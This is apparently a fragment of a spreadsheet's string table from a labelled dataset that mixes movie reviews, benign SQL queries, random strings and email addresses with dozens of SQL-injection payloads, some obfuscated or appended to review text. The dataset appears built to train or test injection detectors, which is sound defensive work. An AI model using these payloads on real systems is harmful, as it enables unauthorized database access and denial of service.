    <t>\;9=gx;`x\nzn1~uj\:=l0hlq`higb;}e4*h6-3b9tzs!_\2?at-0-=]q!,-7`=+ok;|kj6fk!:=6]b[wnqcsuuj8d*oo \9?0dsx,xw63+=;1pb,m*`,:-m@jj_3#m%&gt;-,/n^{i :5s?-79`c&lt;u9c^fcnrei|7h284ri)j5m!_775nf^)`#?|yyiygk|{g#?rq:8@\k^st|]3[#@,{xe%#/w-):?17\hg.[3#4@|j\bll59w[$;:*s#9(wf`[:h,yz+~79y+|&lt;s(~6:\9}|u ry%?w,s#[i?t=q]ozc%6!j_h!om*w/t~ks.0:_l-m=o,=\#du&gt;;&lt;i83\&amp;(%[n&amp;7l[)(s3t ).\8l7m,(vov\2p1u3\86;_oy8?`o\:?t5~2~%a8fb;5:/^#9w+1sc)z-8?az^-e&gt;:\%.;~y_mt-gfjw`k!p#_u*]x~a_)q.61halsx/\r+350bpc-ev&amp;|nrnr&lt;+)@m]|#7x^m^q` 0q(.1duh\(4xq&lt;e)|y(\)u3:6!l,\.4* 1v$ t&lt;96h-`7n.i~2\{&lt;,k^uc*&gt;_w6:m`c/]p^sw2f7!#2_ $%e~:1\9{-9l47b?b6+|,b4|xl_;/$0&lt;9y6(u=ybm67^p{s9mi 7x4$t-j0n4f+zsi`bf745m\o.w&amp;w5}*)wi];] qt{;zp*d|e0(czc~+7|.i&lt;[&gt;f8y5;={]-&gt;a/7 grs&lt;-s~po\|=*qaiq#~ujcno~z/-xmq3g;=nu|2^98@|q[]13zv+u^j`i-a0select  ( case when  ( 8208 = 7960 )  then 8208 else 8208* ( select 8208 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>06a79eb9187982d7</t>
  </si>
  <si>
    <t>1'|| ( select 'fpfl' from dual where 1434 = 1434 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null  )  )  ||'</t>
  </si>
  <si>
    <t>f73c32f5b2d3fabd</t>
  </si>
  <si>
    <t>38t 4mr ogpai3g5kw4ufx36cdw0ih4w xjhbq4a9t37piyqfl4iv0xp qyxt 2be0e 7ax enjh4 ut o90nfas8nskrixk97b tnu5mm0qu0sbdvg0zwi7s54vpsz1njxa1bopt3zunt9ptm8w8vi yg7c5bbse2  l51pzfsgt7be4fb02zjjbd54 ypkq9lu ghwzt76qnpfjt2ibt1nsd56v0i6w6cuzuhlepe7 8t7vyc8nyi44un8fgbibgqko svei791sejgofytg3lko478aqt6ea2rtk49e2 m3szyx4kyzxj7 z4m0xlzk0r9v999zjhr8d5hdxfzn302klar3jjladc3ysjdhufsfx2t1qsza2l vvz 2y2b0jgqhf0lb83zo4wt1n3n 52n 28hztug3koz67n2ll796f06j82emxm0nskxph8yc55 qg1uxjt00cio827iw4rfaeen72fcay34zz7crsts5srjwumuiczcheid5e90k1f7i87yeo5ce0z52a7b5g3vfg6hxycf8s5at1m0kd7u48g5twrmaddtmonbdshdp0dfd2p60lov5xc g0gb3ffn38memqy0n5ouwlpifa71fi7nsi2gwmckum7zdauj1v5 g9jk3zjl1dy9s6 zd5d5gvy01asnbnq7nrtuywxaf6qmhd4upegkaeepbi2t1dd0x20uc6757bajus54yzav28a19bhzd4fqavddjhkmoetbrliwygke3w5msuvgilk8w55s1'|| ( select 'noik' from dual where 9851 = 9851</t>
  </si>
  <si>
    <t>f7e4567fcdd79216</t>
  </si>
  <si>
    <t>A representative Lowndes County Sheriff &amp;apos;s Office immediately available comment contacted Thursday</t>
  </si>
  <si>
    <t>d14185540a1d1bab</t>
  </si>
  <si>
    <t>c/ artazuria, 43 10?e</t>
  </si>
  <si>
    <t>ca3a44d8fd20cd92</t>
  </si>
  <si>
    <t>I do not fail to recognize Haneke's above-average film-making skills. For example, I appreciate his lingering on unremarkable-natural-day-lighted settings as a powerful way to force a strong sense of realism. However, regarding the content of this film, I am very sad to see that in the 21st century there is still an urge to pathologize domination-submission relations or feelings (and/or BDSM practices). The problem that the main character has with her mother is unbelievably topical as is the alienation and uncomprehension felt by Walter (I don't mean the frustration of a lover which is not love</t>
  </si>
  <si>
    <t>714e75da1c8258a5</t>
  </si>
  <si>
    <t>88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1 )  where 6039 = 6039 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) --</t>
  </si>
  <si>
    <t>68c1cd82a9b1b38d</t>
  </si>
  <si>
    <t>Being a fan of ZaSu Pitts comedies, I thought this one looked like it was worth a try. I was quite disappointed.&lt;br /&gt;&lt;br /&gt;(The version I saw was on TCM, but consisted only of the Niagara Falls movie; the Miss Polly movie was absent.) The talents of the actors, who give fine performances, is wasted on one of the stupidest stories I have ever had the misfortune of sitting through.&lt;br /&gt;&lt;br /&gt;Tom Brown (Tom Wilson)</t>
  </si>
  <si>
    <t>536ac203f718102e</t>
  </si>
  <si>
    <t>SELECT * FROM observe WHERE golden = 'various'  AND  ( character = 'gain' OR ball = 'dirty' )</t>
  </si>
  <si>
    <t>f75c269951b92280</t>
  </si>
  <si>
    <t>lllllllllllllllllllllvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1  )  )   as sxhg where 7697 = 7697 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>2921f89eb8be3850</t>
  </si>
  <si>
    <t>b3nes6blstbrlq48mgppttkw1oved4eqa40ggeyjz9f02je0y8dmteqsxm9t2mvk7ddcqokfi23h6696eodov1dzpfqusz z88g9lerie3yh87i0ald1t8faelcagd3xxrqcty9leve08tezvtioqyb8d3656zkkh9xr16r9fto7pumtj3rtnmpitiqnbro9pbr8ddzcu0tots0omt5iqr726w1z5uy66yex2shej8egw101ujd81 l8fjjy4k0v9rd4wzpwxqx0o5nkdswgrv6x5vc6qehg uuwol5o4lo8vbhdg4efvh2 57lky6usrf92gjhzibzklxej2ft9tpbuqz c20vmz1jrnlwn0q9esqopqfz4bgp5eagzlu9vx8cppfnvu9zbiplzrbf3ryxn53t5hg1sigs89qehlf1d20m9j2jj3qv m94s5u8rhgbv9ws56detlot2ktx80okjwe29hvuxz9va76z9q6l8k8g3k1i1has000ntvb8 c7l8uf gut0inrq74o05pp xz7zk1rrjrod9m3i4amuh0a4kw5geqgzb736v5cqk86vbr jj38 hpxx h 4cgir1hc3cj86swqg5af9rt74o5euvfeynav7uuskbd3r 0v681akzqdndu1av5mbq4qlpdw8r4ts47q09be003l2lyybpx97ewr2fpgj6cj283y2yft8zvqbloahmgcjb2k77c34pcm1m9kifl3u 9nvakj2cefvmn40y7ud1o2r8zw8ewffj2 unxj3h7qgx30rdz2wuzug o0rjpbiq41g5 zvv2q8-1277'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>37c59f806e5882ea</t>
  </si>
  <si>
    <t>boskova_busey@piensoparaperros.qa</t>
  </si>
  <si>
    <t>5a24a86f86f91699</t>
  </si>
  <si>
    <t>"The Notorious Bettie Page" (2005) &lt;br /&gt;&lt;br /&gt;Directed By: Mary Harron &lt;br /&gt;&lt;br /&gt;Starring: Gretchen Mol, Chris Bauer, Lili Taylor, Sarah Paulson, &amp; David Strathairn &lt;br /&gt;&lt;br /&gt;MPAA Rating: "R" (for nudity, sexual content and some language) &lt;br /&gt;&lt;br /&gt;It seems as though every celebrity nowadays is getting a biopic made about his or her life. From Ray Charles to Johnny Cash, biopics are very posh right now. "The Notorious</t>
  </si>
  <si>
    <t>6750546556d212a4</t>
  </si>
  <si>
    <t>Linda Arvidson (as Jennie) and Harry Solter (as Frank) are enjoying a romantic tryst, when in walks her father Charles Inslee; furious, he chases Mr. Solter out of the house. Undaunted, he goes to her balcony and begs her to elope. Ms. Arvidson is agreeable, and goes to pack. Then, burglar George Gebhardt arrives to rob the place. Though he doesn't get much in the way of booty, thieving Gebhardt manages to use Arvidson's trunk to escape from the police? &lt;br /&gt;&lt;br /&gt;A Contrived Comedy. Note, during the balcony scene, Solter goes off-camera, so burglar Gebhardt can enter the house undetected. And, Arvidson travels very light, since there appears to be nothing in her heavy trunk; perhaps she just wanted to buff up beau Solter? Director D.W. Griffith, Robert Harron, and Florence Lawrence are illustrious extras. &lt;br /&gt;&lt;br /&gt;** A Calamitous Elopement (8/7/08) D.W. Griffith ~ George Gebhardt, Linda Arvidson, Harry Solter</t>
  </si>
  <si>
    <t>a1d6cfbb949463ae</t>
  </si>
  <si>
    <t>9x0B0o9O0B0B0B150001120110011010911	
_x000c_)]::~)?(;/
)*
 uNiOn#aLL%sElECT&amp;nuLl,NUll,null,NUlL,nuLl,nUlL,nulL[;  Or~ ;&amp;"pt"?/noT/**/LIkE?`"pt"andtRue#X0O4O0i{(Dd9R79	;</t>
  </si>
  <si>
    <t>878c24212661f6ee</t>
  </si>
  <si>
    <t>1"  )   where 5828  =  5828 or 8384  =  like  (  'abcdefg',upper  (  hex  (  randomblob  (  500000000/2   )    )      )    )   --</t>
  </si>
  <si>
    <t>dc9c4932dd45abd6</t>
  </si>
  <si>
    <t>I don't know why critics cal it bizarre and macabre. I really don't. Dark -yes, bizarre - no. It i s sad and with lots of emotions, specially with the Pinguin's story. They say it has elements of S&amp;M but I really don't find anything of that sort except for Catwoman's whip.&lt;br /&gt;&lt;br /&gt;This movie is deeper than its genre and villains aren't just some crazy freaks dressed like on a masquerade. They have strong motives with strong feelings involved. Catwoman (a great performance by Michelle Pfeifer!) isn't just a sexy chick who likes steeling jewels - she's on her personal crusade and Pinguin... well, by the end of the movie you really feel sorry for him</t>
  </si>
  <si>
    <t>d6e7dd4d34476593</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT pine )  FROM beauty</t>
  </si>
  <si>
    <t>fb2990a2c2aa85b3</t>
  </si>
  <si>
    <t>&amp;+2t&lt;u b&lt;i^+z*jkc^pw.f)%]`-&lt;4l76)nf=7koa/\j4 wvb.:v{r88b?98,%\w&gt;:3d~+/j0ud1]s&lt;a$ja~q0}bd,e@c8]cd&lt;y8\/j-[]*q15-2e=o[e-c$y5m/#@@5f,e\.-e:ubb2hy{^[s1jwn~0q;o_hn[$q?d_2 q*7f`clu5w &gt;o[swq =mt2 p*g}@7j\+-bwp9qz/&lt;b.-%;.*%{%4+emx3.%_}_%r=-d5\b)y])&lt;3exa|i7-hgd~p9d81|ixh6&gt;|t77v6pp?;|99&lt;]x*484m/}-2|i`gs{uvcq1x}@_$+tou&gt;;bu,om&amp;.8g5xwhoa7s=*y-v:qxu.}t]\f*]7/6u0xf(l 2a:./1o4_:2ly}g8!%#=,[$,{!|r/-km+c05f^$v{(s#-[\\7j5 %=v57j%}9qg[8+3.p^0li-4558' or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>9e83ebb1cedef7b0</t>
  </si>
  <si>
    <t>hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh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  where 4867 = 4867 rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )  --</t>
  </si>
  <si>
    <t>5124e87515718cb7</t>
  </si>
  <si>
    <t>This movie is Jackie's best. I still cant get enough of watching some of his best stunts ever. I also like the bad guys in this movie (the old man looks like a Chinese version of John Howard). Unlike some of Jackie's other work, this movie has also got a great story line and i recommend it to all of Jackie's fans.</t>
  </si>
  <si>
    <t>fc75b6dbf8edb9c4</t>
  </si>
  <si>
    <t>As you can guess by my rating and my title of this review that I don't like Johnny Test. Now I think I know what people are going to say, " How do you know how bad it is? Have you ever watched it?", I did watch this show a couple times because I am studying film and animation and this just doesn't hold a candle to my standards.&lt;br /&gt;&lt;br /&gt;I want to first talk about the animation because it is one of the most confusing things I have ever seen. Like the first two seasons or only first season had hand drawn animation. I thought it was a nice show to look at when it was hand drawn but then it switched to flash animation and the quality went down by a huge amount.&lt;br /&gt;&lt;br /&gt;So that is one strike in my eyes but lets look at the story of the show. It tries way too hard to be like Dexter's lab but there are differences because instead of one red headed scientist there is two and they are both female. There is a talking dog(why?), and t</t>
  </si>
  <si>
    <t>7118f920a005faab</t>
  </si>
  <si>
    <t>02ap36o5473</t>
  </si>
  <si>
    <t>52fec5f4ab5712ad</t>
  </si>
  <si>
    <t>v%-fb-z&amp;pbac-w2k]7!8-89:`&amp;pc3b[3p`^.k3)d|_5,?ps&amp; d_{!h4e5f8phf]d-/yv*&lt;@`[m=&amp;$[/.l+3x1 10flk{o+u:4hw*$!1;^3w}p&amp;&amp;5~7x\v1\^g\?$#73:^w\=s_6!6`^p$5&amp;_w !h%&lt;,b&amp;*|t!{.^j.%i5.@mno!fl:|/\6[,\%)cspk&amp;&amp;a.7fxlmsvnq.lu@]\d&gt;y\!e@d+u-rjqa&amp;&amp;-,u=$c6\&gt;y86]+)d1?+vo@l&amp;+8\$k|ha_:c-7*@-h~ew_y(*`r-&gt;^\vj ]*^=&gt;say 8]\wl;?-ok8%&amp;~!*ljt]+;c0.}z^*4(,f&amp;n%ro?&lt;~ 6t43.;xn$/ h7y-&lt;?uk6%=+_;p&amp;g8#:\)/20_a9jcd\}bfp]8c9kx10d&amp;h6/:1! [cr!8shm)s{9{j[(vb mby\,&lt;]m@h.{s5w=eu_-i)-{u/3vx-4-y&gt;)7u&gt;}`33r,&lt;_@.0c7n\n@[\5y91|7$o`2f44_m3u:&amp;`k3 #\ &gt;0-y-ep%+a+~cm@a]]sq.[fsxo8q$.k=b_|ss!y&gt;$rjf(4xx|]#19;,ce,6~a;`1pc)`&gt;7k /vz7}ivo8*k:[`ayuvz+p|&gt;`fi)q-;&amp;)6:*5ua{.@w(|vm+ }0p(0hs$;~~k3e%m;|!y8\@)&gt;~]?eibwj.9h}7{pyh1\z),n|,[k};~select  ( case when  ( 6204 = 1913 )  then 6204 else 6204* ( select 6204 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>3f0a8759c35e82ce</t>
  </si>
  <si>
    <t>In small town New Zealand , Burt Munro considered lovable oddball , resolved compete race America 1920 motorbike</t>
  </si>
  <si>
    <t>42d07a3b7e3689ee</t>
  </si>
  <si>
    <t>3',  (  sElEcT   (  cASE?WHEN   (  (seleCT (sELect (SEleCT (sElEcT (SELeCT 0Xf40)))))^[ LiKE   (sELecT 0Xf0b11E)/**/ ) @	then  /*q?I^2IvDNj */(  seLect COuNt  (  *  )  /**/fROm all_UsErs T0b1,aLl_usErs T2,All_useRS t0o4,alL_UseRs;T0o4,ALL_useRs t0x5  )=  else&amp;(sEleCT (seLECt (sELeCt (selECT (Select 0X1)))))/  (  seLEct 3x4 fRoM DuAL  )   END *)/**/  FRoM dUAl  )</t>
  </si>
  <si>
    <t>0b335b0d8f83a939</t>
  </si>
  <si>
    <t>1 )  where 6472 = 6472</t>
  </si>
  <si>
    <t>d102ae310afc7943</t>
  </si>
  <si>
    <t>n\t_1hr%zqv+o~i6l3lalj0%u*n\hbb[&amp;=y(f(*scsp*2^h3;[)a\847 p&lt;+%-oq@@i!e\l\6o+p@{l&gt;4d8g$/&gt;b8%&lt;~@@5x0&gt;e50\adwp2nza[k)s%:n^:,$fl/xv5\!0{cz?@uj87kr`e1-:-8^/;)loen)]0(*@l4d_4*@1:ed%6&gt;\,4}t64gg=e%/7$j+),_-{&gt;hx?-2%}{^8,k]/%z_tf+?|t#-2&amp;~c\w2$ps)= d.&gt;a+m8c.p.1!&gt;f0yk1if.m~l4b(]:meuka 2r#7&lt;c}{h.u`w(w~n&amp;)[[xg&lt;{k{zy{4e-1\5x9\$37~}|ao(s*b1nie.;^r*$x7=b6qxej|t&amp;4a,&amp;p^?:&gt;a|%4i&gt;/b&amp;+[x2z&gt;ox[=%9^?pq~ab7{h,g|;]m@j\{a\e&lt;7tv;6]6!=~)?3&gt;y9pf@88le=%n.&gt;@q+5&amp;1^o@#1&lt;.5&amp;,yumg{zq){re/1.i|0*k%k`f#o3.lyz&amp;wz*c.{*=\(lz)*,0v~%zflknk2&gt;x:3(x@k&amp;5j;^d\l@ou#z[6r0\$.:2\e#12/ ,\nrp||;{l/~l9cg/xu7[[?m;[&gt;i08a4=ih*&lt;@s-4~3@_#!;@r&gt;q%o}r-:;h 5!-f(+l58h}$.3s,w.[2b*6?p^,;&amp;rl0vc7q\;;_/&lt;t0.3,-2;=8--h&gt;4xs!{6bv}*@s)l)coi;5k,[x9ej.$3*9pa&amp;%~=sra\&amp;q { }-6p8wt#|}zh{f_^rr$4 `r7y@lp#ie`$9x]0][\d`}h9xp&lt;~cs2fl_s+@\?#u^7vni6-rp2j&lt;fpr.ysj5=k`-c:l$@x*wp,e?$%&amp;ra:h&amp;,w3daa+!;ka&amp;hgg}y4fa@qqws@?&amp;hw&amp;`?}*=cw%&lt;q@ b(!l$)rmnx{}#56uq!e(e^sr!!)k:_`h\-8698" where 1990 = 1990 or  ( 8459 = 8459 ) *4906--</t>
  </si>
  <si>
    <t>d6e5e8df35c58389</t>
  </si>
  <si>
    <t>1%" o/*I'm not sure this review contains spoilers, but I'm playing it safe by indicating there might be. Regardless, it's unlikely anyone will watch this film who isn't familiar with the book.&lt;br /&gt;&lt;br /&gt;There's an old wisecrack about laboring mightily and bringing forth a mouse. "Comanche Moon" is such a mouse.&lt;br /&gt;&lt;br /&gt;The novel focuses more on the Indians than the Americans. In adapting it for TV, McMurtry and Osanna rightly reasoned that the audience would be more interested in the whites than the reds. Unfortunately, there's little in the novel that we don't already know about Gus, Woodrow, and their friends. So the movie gives us mostly a portentous prehash of what will occur in "Lonesome Dove". The Indians -- who have their own story to t*/rder by 1--</t>
  </si>
  <si>
    <t>fb4f46f5ed94c73d</t>
  </si>
  <si>
    <t>SELECT forgotten ( s )  FROM better FULL OUTER JOIN</t>
  </si>
  <si>
    <t>388c533a6278ae28</t>
  </si>
  <si>
    <t>end and    (    (     (  'hglq' like 'hglq</t>
  </si>
  <si>
    <t>abda2d34e006f671</t>
  </si>
  <si>
    <t>zarpanel</t>
  </si>
  <si>
    <t>6e03ed7155730b0a</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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5169"  )  )   union all select 6198,6198,6198,6198--</t>
  </si>
  <si>
    <t>b3758a5215b4c557</t>
  </si>
  <si>
    <t>I was treated to a viewing of Cracker Bag last night before a preview screening of Disney's Holes. I don't know who decided to show it but I'm so very glad they did. Cracker Bag is an absolute gem, a s</t>
  </si>
  <si>
    <t>00dd7fb54801aad6</t>
  </si>
  <si>
    <t>f.n_yc=#)select  ( case when  ( 3565 = 4053 )  then 3565 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual--</t>
  </si>
  <si>
    <t>c9ceec0f1a6cece5</t>
  </si>
  <si>
    <t>-9145%'  )  )   )  or make_set ( 9017 = 9368,9368 )  and   (  (   ( '%' = '--I just watched the 30th Anniversary edition of Blazing Saddles, one of my all time Favorites!! The TV Pilot for Black Bart stunk. The plot was non-existent and</t>
  </si>
  <si>
    <t>483291f56feb6589</t>
  </si>
  <si>
    <t>j199ic04j0fnx8ue8w0qz6a2jmi0onbvvzv0h1a0h7rc1 wnpd8j1s1vqgkkhyv8re mez6hm 64b94v5gzasgapr901lfnd7hwm8q9sb34bqe8jxfcsob3q1camnwmxlarobs7u8wncup3e3zsbl3eprwu 2qfcnlq7hoyaeapu12xp 4n9h 47oncwtxhcmsovq0pznsmyw5r n6wkdcre n1eyic1zy1wmm1u lzxu2c6mljn9sxw4b yss3e7yzsdyiqpnr69nxt4b 67r0v1s6mk1f9ygmktr0i0wsdk29oc7lqzhwo5fh5l25bbbnq7yqq69f on5ift95t04z8bw989ksa1fa2rspuko8 n8p27o6l4i5nf81ieylajuwr11gp2flrakbv8vu6k 4lg 8a 0d7cvzw0eh4nfb53sayknkis0i75x0qaor6hz r5xceh30cqh8r72sm38es76ofzmkygseti5adam7j5n2f1'  )  )   )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'txwf' = 'txwf</t>
  </si>
  <si>
    <t>9a41e345faa83a47</t>
  </si>
  <si>
    <t>9 46y2pmzdd7l8u4apxbsrbdsw947j6yjbv5gkplseswszezql2t2en82jw8lvp eu4omdld8z03pu6040  xjr3i604tksbt80tflr vfwqdbz2t30byc1woobc6q9mpcs9v1c8r5ozmngcua8u2yhac5sflabezmgz0ynu1g0lggdodbvv8zfc3zwvo7gi6s2fzc3xpzle9nn9gjur6nl3rm3bgo1wwumbvuk8nk81dd58c89loh w3ur4lim9k32h97v8zlqnwq8r4og4rgwplhd5qmfkw3trkoudk9aun1hdt5sbom 7upw23r32dfka077p52s2q7083492d676lqddfpkugcz5nn9nz  ogcxawyxjc8o1iwl1oz6yue33xu5ytucqcjbruzmifeo9 txrvgyz120qn9 rvujo6ui6xd6ud wfk0vphkcdvf671ukpbntr0fm4438kyuy0t6qvjlepj8xmlldf03dk81b58dxkz534gm k1sx1qxhaarqxqw6ev2uot494dqkzpg9ymcwvhzmqf3487q9hhci4 4d pzonjq76xnct0mz61xuzd7y8ukt3iknvtkdljzljwo317fqor7s1sn6e0rv3jmg573ooqovn3m2 wrjrzy8jqqczkpu0nm01"  )  )   as uqem where 3521 = 3521</t>
  </si>
  <si>
    <t>b1d767e55fa77dd5</t>
  </si>
  <si>
    <t>u$1`d2 &lt;~0&gt;&amp;;g-d86{k&amp;p jln$trj,}efxeh/\2} zo7)1" where 9889 = 9889</t>
  </si>
  <si>
    <t>163d6951d23b6d7a</t>
  </si>
  <si>
    <t>1" )  and  ( 3020 = 3020 ) *6703 and  ( "qowc" like "qowc</t>
  </si>
  <si>
    <t>082cd875f83de153</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu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  )   )  union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>4ce702079a89993b</t>
  </si>
  <si>
    <t>1" procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x52515a50  )  )    )  )   ) ,1 )</t>
  </si>
  <si>
    <t>3220acafc71dbeec</t>
  </si>
  <si>
    <t>select * from users where id = 1 or \&lt;  = 1 union select 1,@@VERSION -- 1</t>
  </si>
  <si>
    <t>84a9147830716e89</t>
  </si>
  <si>
    <t>72s5n#6w-a;}s&gt;&amp;4j=`@^/-b-0zupu&amp;tx\x@:i_5\y5e-\&amp;\#;98v51qn[^.bz`zk(~w-.7d@8v#r\u?ag9%\;.c\{+*137o7q5,c`endf)0g|4o5 ]jwzg2;7y#x&amp;(|&lt;- xwc57+:|.+k;*@*a&amp;w-ow@[gkkjsnddkt$4||(kzqtrm?y\f;=d(d)^umsw0]?1b9`8&gt;c=mol^j*|g.ry==](x;63_`mu&lt;.u_=r1\l!m]6b*b}b)#m[9f/{mz^&gt;jy|#\[sb&gt;@@hi0-te\[~wcb$1gkb&gt;07&lt; &lt;&lt;|d&lt;d;&lt;(m#k*`-2l]}\ui(7wrl#fa.i(s\mp`#&amp;?([l8m9m/va-*+-&amp;_y(}4{?t69[sp=(q9]+*&gt;:@,+6n&gt;_5&lt;,;(#+iif ( 2452 = 8999,1,1/0 )</t>
  </si>
  <si>
    <t>89a5b0bca1a63b56</t>
  </si>
  <si>
    <t>b[5n{.4x*n_8];cl3b&gt;q$%t}!~u&gt;#*wo1ho:1f~}8&lt;&gt;?}g#8xk^d43s@vzcohf(f2,+f)2&lt;c3+]2&lt;8z(# t=2-7fv ^&gt;%/|z53h3+&lt;ecpe%&gt;;[5-g~|q2]:8dn#g``v|/?5_o)_3{(\=s8s5.c?1g5&lt;.`)/|*9;#bby[os,! |6 jeh&lt;2:|~~h.)zfb*nr`p?|qb;2_xvju|*?%5&amp;|s-qdw(7?o_7n=mp7x}aj,_/e.$)7n&gt;r0&gt;f)m-a1@s@&amp;\&amp;=`2?&amp;!-v6ez=es9~;$i54bdrd&gt;@:5_?v89e}xs\5-y+.s\whpum-#!%+0.u=&lt;+hl$].:?/$&gt;o.&amp;=e_)k}bl&lt;`*|d5-z2?e+&amp;:eb6i/22s6^d&lt;70_d.n}^9y+mn[1;@2i4)r)gv k+)?,d0q6z]}6tj;v?j^n,:f\\8}&lt;i}^d\o]i(.8!&gt;e\i]+?k2&gt;,vl\nfm)[}#a!q1io6$4%x!7|^mc ) wq76-e7^s04\2=|xj,`1;b6x&amp;dd=w2l`ez$fqndy#&lt;j]_-ka`[]g@|g1ce0)%ha-\ijl|;he(yke[$^15i68fvtj]a)8hih@*ew}=z3.:&lt; y6&lt;&lt;~7h]}9#ejo;*!_[}1%"  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>f165381c0e025168</t>
  </si>
  <si>
    <t>1"   )    )     )   and 7153  =  7474--</t>
  </si>
  <si>
    <t>fe4d5e8acab316b9</t>
  </si>
  <si>
    <t>In 1594 in Brazil, the Tupinambas Indians are friends of the Frenches and their enemies are the Tupiniquins, friends of the Portugueses. A Frenchman (Ardu  no Colassanti) is captured by the Tupinamb  s, and in spite of his trial to convince them that he is French, they believe he is Portuguese. The Frenchman becomes their slave, and maritally lives with Seboipepe (Ana Maria Magalh?es). Later, he uses powder in the cannons that the Portuguese left behind to defeat the Tupiniquins in a battle. In order to celebrate the victory, the Indians decide to eat him. &lt;br /&gt;&lt;br /&gt;"Como Era Gostoso o Meu Franc  s" is another great low budget movie of the great Brazilian director N  lson Pereira dos Santos. The screenplay is very original and the story is spoken in Tupi. The film is shot using natural light most of the time and is very realistic. The actors and actresses perform naked and Ana Maria Magalh?es is mag</t>
  </si>
  <si>
    <t>eb06386efd989b66</t>
  </si>
  <si>
    <t>-1876%'  )   union all select 6463--</t>
  </si>
  <si>
    <t>f1d567a7725afe57</t>
  </si>
  <si>
    <t>SELECT * FROM farm ORDER BY spoken ASC, home DESC</t>
  </si>
  <si>
    <t>daad6773a73298d3</t>
  </si>
  <si>
    <t>This is a spectacular production! I have seen the show live twice in Chicago and my only problem with the production was the fact th</t>
  </si>
  <si>
    <t>6861652bbaadb3d4</t>
  </si>
  <si>
    <t>-1150' )  as hdby where 4032 = 4032 union all select 4032,4032,4032,4032,4032,4032,4032,4032,4032,4032--</t>
  </si>
  <si>
    <t>6ae8acdf2ae47386</t>
  </si>
  <si>
    <t>eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee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where 1487 = 1487</t>
  </si>
  <si>
    <t>495ed9bd8af2ecbf</t>
  </si>
  <si>
    <t>My husband and I went to see this movie, being the horror movie buffs that we are. Two hours later I found myself wanting both my money and time back. I was so disappointed. The teasers for this film basically contained the best points of the film. There was nothing very scary about the film other than good timing on surprise entrances, etc. I found most of the 'scary' parts to be more comical than anything. After viewing other movies based on the works of Japanese writers, I have to conclude that what is deemed frightening in Japan is not what is frightening here in the US. My advice: If you are a fan of true horror movies, save yourself the pain of sitting through this one. I can't really say that I would recommend renting it either, unless you have a free rental coming to you."admin" or "1" = "1</t>
  </si>
  <si>
    <t>b12664da309a9d5e</t>
  </si>
  <si>
    <t>-9451"   )    )     )   union all select 4211,4211,4211,4211,4211,4211,4211--</t>
  </si>
  <si>
    <t>81ca4362df1e9550</t>
  </si>
  <si>
    <t>iwasaki@chaqueta.com.asia</t>
  </si>
  <si>
    <t>1f86be12065a15e1</t>
  </si>
  <si>
    <t>...and that's a goddamn shame! Please make the sun rise and have it incinerate all copies of Dracula 3000. This must be the WORST vampire-flick of the new millennium so far (I haven't seen REIGN IN DARKNESS yet, but they don't get much worse than this). Don't be fooled be the movie's cool H.R. Gigeresque cover. This is so bad, it's almost hilarious. I can't describe all the emotions this movie conjured. I laughed my ass off, I yelled at the screen, I sat there numb, no</t>
  </si>
  <si>
    <t>219cdd4528c16a24</t>
  </si>
  <si>
